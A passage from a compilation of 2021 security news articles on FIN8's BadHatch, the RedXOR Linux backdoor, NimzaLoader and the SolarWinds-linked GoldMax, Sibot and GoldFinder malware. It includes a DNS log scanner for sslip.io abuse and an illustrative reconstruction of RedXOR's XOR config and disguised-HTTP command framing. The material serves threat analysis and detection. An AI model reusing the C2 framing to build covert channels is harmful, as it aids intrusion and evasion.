“The recently reported phishing campaign that spreads the NanoCore trojan is a variation on an old theme,” Saryu Nayyar, CEO at Gurucul, said via email. “It relies on a bit of social engineering, using a plausible hook, to coax a target into opening an infected file. In this case, the attackers are trying to use file formats and naming conventions to keep the target’s anti-malware software from detecting the trojan. However, it still relies on the user falling for the ruse.”


FIN8 Resurfaces with Revamped Backdoor Malware
12.3.2021
Virus  Threatpost

The financial cyber-gang is running limited attacks ahead of broader offensives on point-of-sale systems.

The FIN8 cyberattack group has resurfaced after a period of relative quiet, researchers have found. The gang is using new versions of the BadHatch backdoor to compromise companies in the chemical, insurance, retail and technology industries.

The attacks have been seen hitting organizations around the world, mainly in Canada, Italy, Panama, Puerto Rico, South Africa and the United States, according to an analysis from Bitdefender this week.

FIN8 is a financially motivated threat group whose typical mode of attack has been to steal payment-card data from point-of-sale (PoS) environments, particularly those of retailers, restaurants and the hotel industry. The group has been active since at least 2016, but its activity is characterized by periods of dormancy.

In this case, the last time FIN8 hit targets was mid-2019, according to Bogdan Botezatu, director of threat research at Bitdefender.

“They have been dormant for 18 months (they made big splashes in 2017 and 2019), although they have been running tests on small pools of targets,” he told Threatpost.

FIN8 Tests Waters with Limited Attacks
So far, Bitdefender has identified specific attacks on seven targets during its monitoring of the command-and-control infrastructure used in previous FIN8 attacks.

“While this may sound diminutive, FIN8 is known to get back in business with small tests on a limited pool of victims before they go broad,” Botezatu told Threatpost. “This is a mechanism to validate security on a small subset before moving attacks to production.”

There have been other observed pockets of limited testing in 2020, he added.

This pilot-program approach usually stems from the group refining or adding to its arsenal. And indeed, the latest wave of activity features a new version of the BadHatch backdoor.

Over the course of 2020 and this year, there have been three different “limited release” campaigns using revamped versions of BadHatch.

“The move from the legacy versions 2.12 to current version 2.14 started in mid-2020 (version 2.14 was deployed during Christmas 2020),” Botezatu said.

The Evolving BadHatch Malware
BadHatch is a custom FIN8 malware that was also used in the 2019 attacks. It has now been souped up, with marked improvements in persistence, encryption, information-gathering and the ability to perform lateral movement, according to a Bitdefender analysis released on Wednesday.

The latest backdoor version (v. 2.14), for instance, abuses sslip.io – a free service that resolves hostnames with an embedded IP address to that address, which makes obtaining an SSL certificate for a bare IP easier. BadHatch uses the resulting encrypted channel to conceal PowerShell commands while in transit. While the service is legitimate and widely used, the malware abuses it in an attempt at evading detection, according to Botezatu.

“This prevents security and some monitoring solutions from identifying and blocking PowerShell scripts during delivery from the command-and-control server (C2),” he told Threatpost. “This is particularly important in achieving stealth and, to a larger degree, persistence.”
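The sslip.io hostnames BadHatch uses leave a distinctive trace in DNS and TLS SNI telemetry: the target IP address is spelled out in the name itself. The script below, an added example rather than Bitdefender's code, extracts that address from constructed DNS query log lines, in both the dotted and the dashed form sslip.io accepts, and flags lookups where the embedded target is an internal address. nip.io is included as a comparable service; the article names only sslip.io.

```python
import ipaddress
import re

# Constructed DNS query log: timestamp, client, "query", type, name. Not real telemetry.
SAMPLE_DNS_LOG = """\
2021-03-10T12:00:01Z 10.20.30.40 query A www.example.com
2021-03-10T12:00:05Z 10.20.30.40 query A 203-0-113-55.sslip.io
2021-03-10T12:00:09Z 10.20.30.41 query A update.203.0.113.55.sslip.io
2021-03-10T12:00:12Z 10.20.30.42 query A www.sslip.io
2021-03-10T12:00:20Z 10.20.30.43 query A 10-20-30-50.sslip.io
"""

# sslip.io answers <ip>.sslip.io and <ip-with-dashes>.sslip.io (with any prefix labels)
# with that IP. nip.io is a comparable service (an assumption; the article names sslip.io only).
EMBEDDED_IPV4_RE = re.compile(
    r"(?:^|\.)(\d{1,3})[.-](\d{1,3})[.-](\d{1,3})[.-](\d{1,3})\.(sslip\.io|nip\.io)$")


def embedded_ip(hostname):
    """Return (ip, service) if the name is a wildcard-DNS name carrying an IPv4 address, else None."""
    m = EMBEDDED_IPV4_RE.search(hostname.strip().lower().rstrip("."))
    if not m:
        return None
    try:
        return str(ipaddress.IPv4Address(".".join(m.groups()[:4]))), m.group(5)
    except ValueError:        # an octet above 255: not a valid embedded address
        return None


def scan_dns_log(text):
    """Return one hit per query whose name embeds a target address."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 5:
            continue
        ts, client, _, _, qname = parts[:5]
        found = embedded_ip(qname)
        if found:
            ip, service = found
            hits.append({"ts": ts, "client": client, "qname": qname, "target": ip, "service": service,
                         # an internal target means the name is being used to reach a peer on the LAN
                         "private_target": ipaddress.IPv4Address(ip).is_private})
    return hits


if __name__ == "__main__":
    for h in scan_dns_log(SAMPLE_DNS_LOG):
        print(h)
```

Three of the five constructed queries are hits; www.sslip.io is not, since it carries no address. The same extraction applies to the server-name field of TLS handshakes, which is where a BadHatch-style HTTPS channel to an sslip.io name shows up even when the resolver is not logged.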

The malware has added to its snooping capabilities too, with the ability to learn more about the victim’s network by grabbing screenshots, for instance – this eventually better allows lateral movement within an organization’s environment.

“The lateral movement part is critical, as it targets POS networks,” explained Botezatu. “This is because the malware is usually delivered via malicious attachments. The target victim can be anyone on the network and the malware has to jump from one endpoint to another until it reaches the real targets on the network – POS devices.”

The latest BadHatch version also allows file downloads, which could pave the way for different kinds of attacks in the future, beyond harvesting credit-card data.

“BadHatch has always been correlated with POS attacks, but it has extended backdoor capabilities that let operators perform lateral movement and also has the ability to download additional payloads from specified locations,” Botezatu said. “These payloads can play multiple roles, depending on the attackers’ agenda.”

Like most persistent and skilled cybercrime actors, FIN8 operators are constantly refining their tools and tactics – but they do fall into predictable rhythms. The latest activity is an indication to expect wider attacks soon, according to the researcher.

“FIN8 are the apex predators of the financial fraud ecosystem,” Botezatu said. “They take long breaks to perfect their tools and invest significant resources in circumventing traditional security situations. They are extremely focused on ‘living off the land’ attacks and only start targeting victims after they have battle-tested their tools.”


RedXOR, a new powerful Linux backdoor in Winnti APT arsenal
12.3.2021
Virus  Securityaffairs

Intezer experts have spotted a new strain of Linux backdoor dubbed RedXOR that is believed to be part of the arsenal of the China-linked Winnti APT.
Researchers from Intezer have discovered a new sophisticated backdoor, tracked as RedXOR, that targets Linux endpoints and servers. The malware was likely developed by the China-linked cyber espionage group Winnti.

“We have discovered an undocumented backdoor targeting Linux systems, masqueraded as polkit daemon. We named it RedXOR for its network data encoding scheme based on XOR.” reads the analysis published by Intezer.

RedXOR masquerades as a polkit daemon and shares many similarities with malware employed in past cyber espionage campaigns attributed to the Winnti group (the PWNLNX backdoor and the XOR.DDOS and Groundhog botnets).

polkit is an application-level toolkit for defining and handling the policy that allows unprivileged processes to speak to privileged processes.

The malware encodes its network data with an XOR-based scheme. Experts also noticed that the samples they analyzed were compiled with a legacy GCC compiler on an old release of Red Hat Enterprise Linux, which suggests that the malware was employed in targeted attacks against legacy Linux systems.

Intezer researchers analyzed two samples of the malware that were uploaded from Indonesia and Taiwan on February 23 and 24.

RedXOR, like the Winnti-linked PWNLNX and XOR.DDOS families, is an unstripped 64-bit ELF file (named “po1kitd-update-k”).

Upon execution, the malware creates a hidden folder called “.po1kitd.thumb”, where it stores its files, and then proceeds with its installation. RedXOR forks a child process and lets the parent exit, detaching the process from the shell.

“The new child determines if it has been executed as the root user or as another user on the system. It does this to create a hidden folder, called “.po1kitd.thumb”, inside the user’s home folder which is used to store files related to the malware. The malware creates a hidden file called “.po1kitd-2a4D53” inside the folder.” continues the report. “The file is locked to the current running process essentially creating a mutex. If another instance of the malware is executed, it also tries to obtain the lock but ultimately fails. Upon this failure the process exits.”

The malware stores its configuration encrypted within the binary; it includes the command-and-control (C2) IP address and port, a password used to authenticate the malware to the C2, and settings for optionally working through a proxy.

The malware uses the “doXor” function to decrypt the configuration values, the decryption logic is a simple XOR against a byte key.

The malware communicates with the C2 server over a TCP socket and the traffic is disguised as HTTP traffic.

RedXOR extracts “JSESSIONID”, “Content-Length”, “Total-Length” and the response body, where the JSESSIONID value holds the command ID for the job the C2 wants the malware to perform.

RedXOR supports multiple commands to implement multiple capabilities, including gathering system information (i.e. MAC address, username, distribution, clock speed, kernel version, etc.), updating the malware, performing file operations, providing the operator with a “tty” shell, executing commands with system privileges, and running arbitrary shell commands.

“Linux systems are under constant attack given that Linux runs on most of the public cloud workload. A survey conducted by Sophos found that 70% of organizations using the public cloud to host data or workloads experienced a security incident in the past year.” conclude the experts.

“Along with botnets and cryptominers, the Linux threat landscape is also home to sophisticated threats like RedXOR developed by nation-state actors.”
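The configuration decryption and the disguised HTTP exchange described in this article and in the Threatpost piece above, as an added example; this is not Intezer's code and does not reproduce the sample's key, field layout or command codes. The single-byte key, the NUL-separated field order, the JSESSIONID cookie as carrier of the command ID and the XOR-encoded body are all assumptions made for illustration.

```python
import re

# Assumed single-byte key for the illustration; the real sample's key is not reproduced here.
CONFIG_KEY = 0x4B


def do_xor(buf, key=CONFIG_KEY):
    """Single-byte XOR in the style of the doXor routine: symmetric, so one function
    both encrypts and decrypts."""
    return bytes(b ^ key for b in buf)


def build_encrypted_config():
    """Construct an encrypted config blob: NUL-separated fields in an assumed order
    (C2 IP, port, password, proxy flag). The layout is illustrative, not RedXOR's."""
    plain = b"203.0.113.10\x00" + b"8080\x00" + b"s3cret\x00" + b"proxy=0\x00"
    return do_xor(plain)


def parse_config(blob):
    """Decrypt the blob and split it into the fields the backdoor needs."""
    ip, port, password, proxy = (f.decode() for f in do_xor(blob).split(b"\x00")[:4])
    return {"c2_ip": ip, "c2_port": int(port), "password": password,
            "use_proxy": proxy.partition("=")[2] == "1"}


def build_sample_response():
    """Construct a C2 reply disguised as HTTP. Carrying the command ID in a JSESSIONID
    cookie and XOR-encoding the body are assumptions about the framing."""
    body = do_xor(b"id;uname -a")
    head = (b"HTTP/1.1 200 OK\r\nServer: Apache\r\n"
            b"Set-Cookie: JSESSIONID=3; Path=/\r\n"
            b"Content-Length: %d\r\nTotal-Length: %d\r\n\r\n" % (len(body), len(body)))
    return head + body


JSESSIONID_RE = re.compile(rb"JSESSIONID=([0-9A-Za-z]+)")


def parse_c2_response(raw):
    """Split the pseudo-HTTP reply into the fields the backdoor extracts."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete header block")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    m = JSESSIONID_RE.search(headers.get(b"set-cookie", b""))
    content_length = int(headers.get(b"content-length", b"0"))
    total_length = int(headers.get(b"total-length", content_length))
    if len(body) < content_length:
        raise ValueError("body shorter than Content-Length")
    return {
        "status": lines[0].decode(errors="replace"),
        "command_id": int(m.group(1)) if m else None,   # assumed to be decimal
        "content_length": content_length,
        "total_length": total_length,
        "body": do_xor(body[:content_length]),
        # A Total-Length larger than Content-Length would mean more chunks follow.
        "complete": content_length == total_length,
    }


if __name__ == "__main__":
    print(parse_config(build_encrypted_config()))
    print(parse_c2_response(build_sample_response()))
```

The point of the exercise is the detection angle: because the "HTTP" framing is plain text and only the body is XOR-encoded, a network sensor can still key on the header shape, and a single-byte XOR key can be recovered from any response body that is known to contain a predictable character, such as the trailing newline of a shell command.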


Nim-Based Malware Loader Spreads Via Spear-Phishing Emails

11.3.2021 Virus  Threatpost
Spear-phishing emails are spreading the NimzaLoader malware loader, which some say may be used to download Cobalt Strike.

The TA800 threat group is distributing a malware loader, which researchers call NimzaLoader, via ongoing, highly-targeted spear-phishing emails.

While previous Twitter analysis identified this loader as a mere variant of TA800’s existing BazaLoader malware, new research cites evidence that NimzaLoader is a disparate strain — with its own separate string-decryption methods and hashing algorithm techniques.

The malware loader is unique in that it is written in the Nim programming language. The use of Nim is uncommon for malware in the threat landscape, except in rare cases, such as a Nim-based downloader recently seen being used by the Zebrocy threat group. Because of this, researchers say malware developers may be using Nim to avoid detection by defense teams who may not be familiar with the language.

“Malware developers may choose to use a rare programming language to avoid detection, as reverse engineers may not be familiar with Nim’s implementation, or focused on developing detection for it, and therefore tools and sandboxes may struggle to analyze samples of it,” said Dennis Schwarz and Matthew Mesa, researchers with Proofpoint on Wednesday, in a report shared with Threatpost before publication.

NimzaLoader is used as “initial-access malware” and was first discovered being distributed by the TA800 threat actor in February, said researchers. TA800 is an affiliate distributor of TrickBot and BazaLoader (also known as the BazarBackdoor, BazarCall, etc.). The campaign was spotted targeting about 100 organizations across approximately 50 verticals, Proofpoint researchers told Threatpost.

It is unclear what NimzaLoader’s primary purpose is at this time – however, some evidence suggests the loader is being used to download and execute the Cobalt Strike commodity malware as its secondary payload, researchers said.

BazaLoader Versus NimzaLoader
Some initial analysis of NimzaLoader by various researchers on Twitter has indicated that it may be a variant of BazaLoader, another loader used by TA800 that has the primary function of downloading and executing additional modules. But, researchers with Proofpoint pointed to evidence that they say shows NimzaLoader is not merely a BazaLoader variant: “Based on our observations of significant differences, we are tracking this as a distinct malware family,” they said.

They cited several major differences between NimzaLoader and BazaLoader: For instance, the two samples use different code-flattening obfuscators, different styles of string decryption and different XOR/rotate-based Windows API hashing algorithms, they said. Other tactics that set NimzaLoader apart include the fact that the malware doesn’t use a domain-generation algorithm and that it makes use of JSON in its command-and-control (C2) communications.

The Email Spear-Phishing Campaign
A sample spear-phishing email. Credit: Proofpoint.

Researchers first observed the NimzaLoader campaign on Feb. 3, in the form of emails with “personalized details” for victims – including their names and company names.

The messages purport to come from a coworker, saying he is “late” driving into the office and asking the email recipient to check over a presentation. The message sends a URL link (which is shortened) that purports to be a link to a PDF preview.

If the email recipient clicks on the link, they are redirected to a landing page hosted on email marketing service GetResponse. That page links to the “PDF” and tells the victim to “save to preview.” This link in turn actually takes the victim to the NimzaLoader executable.

NimzaLoader Malware Executable
Upon closer inspection, researchers found that NimzaLoader is developed using Nim (as evidenced by various “nim” related strings in the executable). The malware uses mostly encrypted strings, using an XOR-based algorithm and a single key per string. One encrypted string contains a timestamp and is used to set an expiration date for the malware. For instance, in one analyzed sample the expiration date was set to Feb. 10 at 1:20:55.003 p.m. – meaning the malware would not run after that date and time.

Most of the other strings contain command names. These commands include the ability to execute powershell.exe and inject a shellcode into a process as a thread. While the NimzaLoader C2 servers were down at the time of research, researchers said a public malware sandbox appeared to show the malware receiving a PowerShell command that ultimately delivered a Cobalt Strike beacon.

“We are unable to validate or confirm this finding, but it does align with past TA800 tactics, techniques and procedures (TTPs),” they said.

TA800 Threat Group: The Future of NimzaLoader
Researchers linked NimzaLoader back to TA800, a threat group that has targeted a wide range of industries in North America, infecting victims with banking trojans and malware loaders.

According to Proofpoint researchers, TA800’s previous campaigns have often included malicious emails with recipients’ names, titles and employers, along with phishing pages designed to look like the targeted company. Researchers noted that the malware shows TA800 continuing to integrate different tactics into their campaigns.

“It is… unclear if Nimzaloader is just a blip on the radar for TA800—and the wider threat landscape—or if Nimzaloader will be adopted by other threat actors in the same way BazaLoader has gained wide adoption,” said researchers.


Researchers Unveil New Linux Malware Linked to Chinese Hackers
11.3.2021
Virus  Thehackernews

Cybersecurity researchers on Wednesday shed light on a new sophisticated backdoor targeting Linux endpoints and servers that's believed to be the work of Chinese nation-state actors.

Dubbed "RedXOR" by Intezer, the backdoor masquerades as a polkit daemon, with similarities found between the malware and those previously associated with the Winnti Umbrella (or Axiom) threat group such as PWNLNX, XOR.DDOS and Groundhog.

RedXOR's name comes from the fact that it encodes its network data with a scheme based on XOR, and that it's compiled with a legacy GCC compiler on an old release of Red Hat Enterprise Linux, suggesting that the malware is deployed in targeted attacks against legacy Linux systems.

Intezer said two samples of the malware were uploaded from Indonesia and Taiwan around Feb. 23-24, both countries that are known to be singled out by China-based threat groups.

Beyond its overlaps with PWNLNX in overall flow, functionality and the use of XOR encoding, the backdoor takes the form of an unstripped 64-bit ELF file ("po1kitd-update-k") with a typosquatted name ("po1kitd" vs. "polkitd"); upon execution it creates a hidden directory to store files related to the malware, before installing itself on the machine.

Polkit (née PolicyKit) is a toolkit for defining and handling authorizations, and is used for allowing unprivileged processes to communicate with privileged processes.

Additionally, the malware comes with an encrypted configuration that houses the command-and-control (C2) IP address and port, and the password it needs to authenticate to the C2 server, before establishing connection over a TCP socket.

What's more, the communications are not only disguised as harmless HTTP traffic, but are also encoded both ways using an XOR encryption scheme, the results of which are decrypted to reveal the exact command to be run.

RedXOR supports a multitude of capabilities, including gathering system information (MAC address, username, distribution, clock speed, kernel version, etc.), performing file operations, executing commands with system privileges, running arbitrary shell commands, and even options to remotely update the malware.

Users victimized by RedXOR can take protective measures by killing the process and removing all files related to the malware.

If anything, the latest development points to an increase in the number of active campaigns targeting Linux systems, in part due to widespread adoption of the operating system for IoT devices, web servers, and cloud servers, leading attackers to port their existing Windows tools to Linux or develop new tools that support both platforms.

"Some of the most prominent nation-state actors are incorporating offensive Linux capabilities into their arsenal and it's expected that both the number and sophistication of such attacks will increase over time," Intezer researchers outlined in a 2020 report charting the last decade of Linux APT attacks.


FIN8 Hackers Return With More Powerful Version of BADHATCH PoS Malware
11.3.2021
Virus  Thehackernews
Threat actors known for keeping a low profile do so by ceasing operations for prolonged periods to avoid attracting attention, and by constantly refining their toolsets to fly below the radar of many detection technologies.

One such group is FIN8, a financially motivated threat actor that's back in action after a year-and-a-half hiatus with a powerful version of a backdoor with upgraded capabilities including screen capturing, proxy tunneling, credential theft, and fileless execution.

First documented in 2016 by FireEye, FIN8 is known for its attacks against the retail, hospitality, and entertainment industries while making use of a wide array of techniques such as spear-phishing and malicious tools like PUNCHTRACK and BADHATCH to steal payment card data from point-of-sale (POS) systems.

"The FIN8 group is known for taking long breaks to improve TTPs and increase their rate of success," Bitdefender researchers said in a report published today. "The BADHATCH malware is a mature, highly advanced backdoor that uses several evasion and defense techniques. The new backdoor also attempts to evade security monitoring by using TLS encryption to conceal Powershell commands."

BADHATCH, since its discovery in 2019, has been deployed as an implant capable of running attacker-supplied commands retrieved from a remote server, in addition to injecting malicious DLLs in a current process, gathering system information, and exfiltrating data to the server.

Noting that at least three different variants of the backdoor (v2.12 to 2.14) have been spotted since April 2020, the researchers said the latest version of BADHATCH abuses a legitimate service called sslp.io to thwart detection during the deployment process, using it to download a PowerShell script, which in turn executes the shellcode containing the BADHATCH DLL.

The PowerShell script, besides being responsible for achieving persistence, also handles privilege escalation so that all commands executed after the script runs are executed as the SYSTEM user.

Furthermore, a second evasion technique adopted by FIN8 involves disguising communications with the command-and-control (C2) server as legitimate HTTP requests.

According to Bitdefender, the new wave of attacks is said to have taken place over the past year and directed against insurance, retail, technology, and chemical industries in the U.S., Canada, South Africa, Puerto Rico, Panama, and Italy.

"Like most persistent and skilled cyber-crime actors, FIN8 operators are constantly refining their tools and tactics to avoid detection," the researchers concluded, urging businesses to "separate the POS network from the ones used by employees or guests" and filter out emails containing malicious or suspicious attachments.


GoldMax, GoldFinder, and Sibot, 3 new malware used by SolarWinds attackers
6.3.2021
Virus  Securityaffairs

Microsoft experts continue to investigate the SolarWinds attack and spotted 3 new strains of malware used as second-stage payloads.
Microsoft announced the discovery of three new pieces of malware that the threat actors behind the SolarWinds attack, tracked by the IT giant as Nobelium, used as second-stage payloads.

Microsoft’s initial investigation revealed the existence of the Sunburst backdoor and the Teardrop malware; now the Microsoft Threat Intelligence Center (MSTIC) team and the Microsoft 365 Defender Research Team have announced the discovery of three new malware strains tracked as GoldMax, Sibot, and GoldFinder.

“Microsoft discovered these new attacker tools and capabilities in some compromised customer networks and observed them to be in use from August to September 2020. Further analysis has revealed these may have been on compromised systems as early as June 2020. These tools are new pieces of malware that are unique to this actor.” reads the analysis published by Microsoft. “They are tailor-made for specific networks and are assessed to be introduced after the actor has gained access through compromised credentials or the SolarWinds binary and after moving laterally with TEARDROP and other hands-on-keyboard actions.”

These three pieces of malware were used by the threat actors to maintain persistence and perform malicious actions in very targeted attacks.

The tailor-made malware was used as a second-stage payload; the attack vectors were compromised credentials, the SolarWinds binary, lateral movement conducted with the TEARDROP malware, or in some cases manual deployment.

The first malware, dubbed GoldMax, is a Go-based malware used as a command-and-control backdoor by the attackers. The malware used a scheduled task impersonating systems management software as a persistence trick. GoldMax implements a decoy network traffic generator to hide network traffic and avoid detection.

The second malware, dubbed Sibot, is a dual-purpose malicious code written in VBScript used by the threat actors to gain persistence and to download and execute a payload from a remote C2 server.

The third malware, dubbed GoldFinder, is also written in Go and is likely used as a custom HTTP tracer tool that logs the route or hops that a packet takes to reach a hardcoded C2 server.

Microsoft provided details about the malware and the alerts provided by its security solution when detecting behavior associated with a wide range of attacks, including the NOBELIUM’s activity.

This week, malware researchers at FireEye discovered a new sophisticated second-stage backdoor, dubbed Sunshuttle, while analyzing the servers of an organization that was compromised as a result of the SolarWinds supply-chain attack.

“In all stages of the attack, the actor demonstrated a deep knowledge of software tools, deployments, security software and systems common in networks, and techniques frequently used by incident response teams.” states Microsoft.


Three New Malware Strains Linked to SolarWinds Hackers
6.3.2021
Virus  Securityweek

Microsoft and cybersecurity firm FireEye on Thursday published blog posts detailing several new pieces of malware that they believe are linked to the hackers behind the supply chain attack targeting Texas-based IT management solutions provider SolarWinds.

Microsoft has started tracking the threat actor behind the SolarWinds attack as NOBELIUM. The company has identified three new pieces of malware that it believes are used by the group after they have compromised the targeted organization’s network. The malware, named GoldMax, GoldFinder and Sibot, has been used to maintain persistence and for other “very specific” actions.

GoldMax, a malware developed in Go and designed to act as a command and control backdoor, persists by creating a scheduled task that impersonates system management software. The malware allows its operators to download and execute files on the compromised device, upload files to the C&C server, execute OS commands, spawn a command shell, and update the malware’s configuration data.

GoldMax uses various techniques to hide its activities and evade detection. It can step into action as soon as it reaches a system, or it can be configured to initiate malicious activities only at a date and time specified in its configuration file.

The blog post published by FireEye also details this piece of malware, which the company tracks as SUNSHUTTLE. FireEye said the sample analyzed by its researchers was uploaded to a public malware repository in August 2020 by a US-based entity.

FireEye described SUNSHUTTLE as a second-stage backdoor and said it had seen the malware on the systems of an organization targeted by the SolarWinds hackers, which it tracks as UNC2452. However, while the company has found evidence that the malware is linked to UNC2452, it could not fully verify the connection.

Another new NOBELIUM-linked malware discovered by Microsoft is Sibot, which the tech giant described as a dual-purpose malware written in VBScript. Sibot helps the attackers achieve persistence on the compromised computer and allows them to download and execute another payload from a remote server.

The third piece of malware linked by Microsoft to the SolarWinds hackers is named GoldFinder and it has been described as a “custom HTTP tracer tool that logs the route or hops that a packet takes to reach a hardcoded C2 server.” GoldFinder can find the HTTP proxy servers, network security devices and other systems that a request travels through before reaching the C&C server.

SolarWinds has been targeted by at least two threat groups. One of them, which has been linked to Russia, was behind the supply chain attack that involved hacking into SolarWinds’ networks and the delivery of malware to thousands of its customers. This is the threat group that is believed to have used the malware described this week by Microsoft and FireEye.

Microsoft believes as many as 1,000 hackers were involved in this attack, but many experts have expressed doubt regarding those claims.

SolarWinds was also targeted by an unrelated threat actor believed to be operating out of China, which did not compromise its systems and instead launched attacks involving the exploitation of a zero-day vulnerability in a SolarWinds product after they gained access to the targeted organization’s systems.


Managed Services Provider CompuCom Hit by Malware
6.3.2021 Virus  Securityweek

Managed services provider CompuCom was recently targeted in a cyberattack that led to some disruption to customer services and internal operations.

In a statement issued on Wednesday, the MSP said some of its IT systems became infected with a piece of malware, which impacted the services provided to certain customers.

Its investigation is ongoing, but CompuCom said there had been no indication that customers’ systems were “directly impacted by the incident.”

“As soon as we became aware of the situation, we immediately took steps to contain it, and engaged leading cybersecurity experts to begin an investigation. We are also communicating with customers to provide updates about the situation and the actions we are taking,” the company stated.

It added, “We are in the process of restoring customer services and internal operations as quickly and safely as possible.”

CompuCom has not shared any technical information about the incident, but BleepingComputer reported learning that the company was targeted in a ransomware attack.

CompuCom is a wholly owned subsidiary of The ODP Corporation, the company behind OfficeMax and Office Depot. It provides workplace and staff services and technology solutions to companies of all sizes.


Researchers Find 3 New Malware Strains Used by SolarWinds Hackers
6.3.2021
Virus  Thehackernews

FireEye and Microsoft on Thursday said they discovered three more malware strains in connection with the SolarWinds supply-chain attack, including a "sophisticated second-stage backdoor," as the investigation into the sprawling espionage campaign continues to yield fresh clues about the threat actor's tactics and techniques.

Dubbed GoldMax (aka SUNSHUTTLE), GoldFinder, and Sibot, the new set of malware adds to a growing list of malicious tools such as Sunspot, Sunburst (or Solorigate), Teardrop, and Raindrop that were stealthily delivered to enterprise networks by alleged Russian operatives.

"These tools are new pieces of malware that are unique to this actor," Microsoft said. "They are tailor-made for specific networks and are assessed to be introduced after the actor has gained access through compromised credentials or the SolarWinds binary and after moving laterally with Teardrop and other hands-on-keyboard actions."

Microsoft also took the opportunity to name the actor behind the attacks against SolarWinds as NOBELIUM, which is also being tracked under different monikers by the cybersecurity community, including UNC2452 (FireEye), SolarStorm (Palo Alto Unit 42), StellarParticle (CrowdStrike), and Dark Halo (Volexity).

While Sunspot was deployed into the build environment to inject the Sunburst backdoor into SolarWinds's Orion network monitoring platform, Teardrop and Raindrop have been primarily used as post-exploitation tools to laterally move across the network and deliver the Cobalt Strike Beacon.

Spotted between August to September 2020, SUNSHUTTLE is a Golang-based malware that acts as a command-and-control backdoor, establishing a secure connection with an attacker-controlled server to receive commands to download and execute files, upload files from the system to the server, and execute operating system commands on the compromised machine.

For its part, FireEye said it observed the malware at a victim compromised by UNC2452, but added it hasn't been able to fully verify the backdoor's connection to the threat actor. The company also stated it discovered SUNSHUTTLE in August 2020 after it was uploaded to a public malware repository by an unnamed U.S.-based entity.

One of the most notable features of GoldMax is the ability to cloak its malicious network traffic with seemingly benign traffic by pseudo-randomly selecting referrers from a list of popular website URLs (such as www.bing.com, www.yahoo.com, www.facebook.com, www.twitter.com, and www.google.com) for decoy HTTP GET requests pointing to C2 domains.

"The new SUNSHUTTLE backdoor is a sophisticated second-stage backdoor that demonstrates straightforward but elegant detection evasion techniques via its 'blend-in' traffic capabilities for C2 communications," FireEye detailed. "SUNSHUTTLE would function as a second-stage backdoor in such a compromise for conducting network reconnaissance alongside other Sunburst-related tools."

GoldFinder, also written in Go, is an HTTP tracer tool for logging the route a packet takes to reach a C2 server. In contrast, Sibot is a dual-purpose malware implemented in VBScript that's designed to achieve persistence on infected machines before downloading and executing a payload from the C2 server. Microsoft said it observed three obfuscated variants of Sibot.

Even as the different pieces of SolarWinds attack puzzle fall into place, the development once again underscores the scope and sophistication in the range of methods used to penetrate, propagate, and persist in victim environments.

"These capabilities differ from previously known NOBELIUM tools and attack patterns, and reiterate the actor's sophistication," Microsoft said. "In all stages of the attack, the actor demonstrated a deep knowledge of software tools, deployments, security software and systems common in networks, and techniques frequently used by incident response teams."


Microsoft, FireEye Unmask More Malware Linked to SolarWinds Attackers

5.3.2021 Virus  Securelist

Researchers with Microsoft and FireEye found three new malware families, which they said are used by the threat group behind the SolarWinds attack.

Researchers have uncovered more custom malware that is being used by the threat group behind the SolarWinds attack.

Researchers with Microsoft and FireEye identified three new pieces of malware that the companies said are being used in late-stage activity by the threat actor (previously called Solarigate by Microsoft and now renamed Nobelium; called UNC2452 by FireEye).

The malware families include: A backdoor that’s called GoldMax by Microsoft and called Sunshuttle by FireEye; a dual-purpose malware called Sibot discovered by Microsoft; and a malware called GoldFinder also found by Microsoft.

Adversaries were able to use SolarWinds’ Orion network management platform to infect targets by pushing out a custom backdoor called Sunburst via trojanized product updates. Sunburst was delivered to almost 18,000 organizations around the globe, starting last March. With Sunburst embedded, the attackers were then able to pick and choose which organizations to further penetrate, in a sprawling cyberespionage campaign that has hit the U.S. government, tech companies and others hard.

Microsoft said that it discovered these latest custom attacker tools lurking in some customer networks compromised by the SolarWinds attackers. It observed them in use from August to September; however, researchers said further analysis revealed they may have been on compromised systems as early as last June.

“These tools are new pieces of malware that are unique to this actor,” said Ramin Nafisi and Andrea Lelli with Microsoft, in a posting on Thursday. “They are tailor-made for specific networks and are assessed to be introduced after the actor has gained access through compromised credentials or the SolarWinds binary, and after moving laterally with Teardrop and other hands-on-keyboard actions.”

GoldMax/Sunshuttle Malware
Researchers with both FireEye and Microsoft ran across the malware called GoldMax/Sunshuttle, and published analyses about it in joint releases. FireEye researchers said the malware’s infection vector is unknown and that it is likely a second-stage backdoor dropped after an initial compromise on the system. The backdoor was uploaded by a U.S.-based entity to a public malware repository in August.

Most notable about GoldMax/Sunshuttle is the fact that it can select referrers from a list of popular website URLs (including Bing.com, Yahoo.com, Facebook.com and Google.com) to help its network traffic “blend in” with legitimate traffic — providing a stealthy way to bypass detection.

“The new Sunshuttle backdoor is a sophisticated second-stage backdoor that demonstrates straightforward but elegant detection-evasion techniques via its ‘blend-in’ traffic capabilities for command-and-control (C2) communications,” said researchers with FireEye, in a release on Thursday. “Sunshuttle would function as second-stage backdoor in such a compromise for conducting network reconnaissance alongside other Sunburst-related tools.”

Upon execution, the backdoor, written in the Go programming language, first enumerates the victim’s MAC address and compares it to a hardcoded MAC address value, which researchers say is likely a default MAC address for the Windows sandbox network adaptor. If a match is found, the backdoor exits. If not, it determines the configuration settings for the system and then requests and retrieves a “session key” for the C2 server.

“Analysis is ongoing on how the decrypted session key is used, but it is likely a session key used to encrypt content once Sunshuttle transitions to its command-and-control routines,” said researchers.

Once a session key is retrieved from the C2, the malware issues a beacon that retrieves commands, and then parses the response content to determine which command should be run. The commands from the C2 include remotely updating its configuration, uploading and downloading files, and arbitrary command execution.

Sibot Malware
Microsoft researchers also found another malware family called Sibot, designed to achieve persistence on infected machines before downloading and executing a payload from the C2 server.

Sibot malware. Credit: Microsoft.

Sibot is implemented in VBScript, the Active Scripting language developed by Microsoft that is modeled on Visual Basic. Researchers said that the malware’s VBScript file is given a name mimicking a legitimate Windows task, which is either stored in the registry of the compromised system or in an obfuscated format on disk. It is then run via a scheduled task.

“The scheduled task calls an MSHTA application to run Sibot via the obfuscated script,” said the researchers, who found three variants of the malware. “This simplistic implementation allows for a low footprint for the actor, as they can download and run new code without changes to the compromised endpoint by just updating the hosted DLL.”

A second-stage script is then called to download and run a payload from the remote C2 server.

GoldFinder Malware
